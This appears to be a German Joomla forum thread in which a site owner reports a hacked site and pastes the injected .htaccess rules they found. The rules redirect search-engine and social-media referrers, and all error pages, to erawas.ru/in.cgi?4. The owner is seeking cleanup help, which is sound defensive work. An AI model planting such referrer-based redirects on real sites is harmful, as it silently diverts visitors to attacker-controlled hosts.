|
Willkommen,
Gast
|
THEMA: joomla hack: plat-tan.ru ???
joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78536
|
hallo zusammen...
hab in den letzten tagen ein seltsames verhalten auf einer meiner joomla seiten festgestellt. und zwar, dass bei facebook links auf diese seite die seite einerseits auf google.com weiterleitet und nicht auf die seite selbst. andererseits, und vor allem geht es mir darum, scheint in der firefox web-console beim aufruf der seite eine seltsamer eintrag auf, nämlich: [18:15:40.501] GET http:// plat-tan . ru / in.cgi?4 [HTTP/1.1 302 Found 1079ms] ich nehme mal an, meine seite wurde gehackt  aber ich hab keine ahnung durch welche hintetürdas joomla system ist 1.5.26 firefox 11 kennt wer obige webadresse in russland????? ist das malware von irgendeiner extension???? ich hab jetzt einige stunden versucht im forum und im netz was zu diesem thema zu finden, also hoffe ich, dass ich keine forums-regeln durch dieses posting verletzt habe  lg milliways |
|
|
Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78538
|
|
|
Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78544
|
|
|
Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78563
|
danke leute....
mein avira antivirus läuft gerade, hat auch schon "funde" :-/.... und ich hab mittels webftp über meinen provider die .htaccess datei geöffnet, und wurde auch fündig... im file .htaccess (alle .htaccess files in allen verzeichnissen ;-/) <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ erawas.ru/in.cgi?4 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ erawas.ru/in.cgi?4 [R=301,L] </IfModule> ErrorDocument 400 erawas.ru/in.cgi?4 ErrorDocument 401 erawas.ru/in.cgi?4 ErrorDocument 403 erawas.ru/in.cgi?4 ErrorDocument 404 erawas.ru/in.cgi?4 ErrorDocument 500 erawas.ru/in.cgi?4 ich nehme mal an, dass zeux kann ich alles löschen, oder??? ftp paßwort für den server hab ich bereits geändert.... ich werd hier weiter den fortschritt posten und auch den link von jan nochmal durchgehen... mod_rewrite ist in der konfiguration übgrigens "off", nicht wie oben im zitat "on"... nervig das ganze  |
|
|
Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78564
|
|
Lieber verrückt die Welt genießen, als normal langweilen.
 |
Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78570
|
|
|
Kunena Forum